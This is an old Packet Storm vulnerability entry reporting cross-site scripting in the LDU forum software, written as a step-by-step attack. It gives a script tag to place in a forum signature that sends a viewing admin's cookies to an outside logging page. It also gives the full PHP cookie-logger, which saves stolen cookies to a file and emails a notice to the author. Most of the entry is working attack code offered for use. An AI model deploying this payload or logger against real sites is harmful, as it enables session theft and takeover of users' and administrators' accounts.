lduXSS2.txt

2005-08-31T00:00:00
ID PACKETSTORM:39697
Type packetstorm
Reporter spyMASter
Modified 2005-08-31T00:00:00

Description

                                        
                                            `Bug finder:spyMASter  
Web site:Realhackers.net  
Contact:bendeniz_avci@hotmail.com  
  
LDU has some xss vulns   
Firstly you can use html codes in your signature you can get cookies with this  
put your signature that code  
  
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>  
  
and post a topic to forum when admin look this topic she/he redirect and you can get cookie  
  
this is codes of ekle.php you can save cookie to a with this php code  
  
  
<?php  
$kayit = fopen("spymaster.txt","a");  
foreach($_GET as $variable => $value) {  
fwrite($kayit,$variable . ": " . $value . "\n");  
}  
fwrite($kayit,"---------------------------\n");  
fclose($kayit);  
mail("bendeniz_avci@hotmail.com","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster@realhackers.net');  
?>  
  
`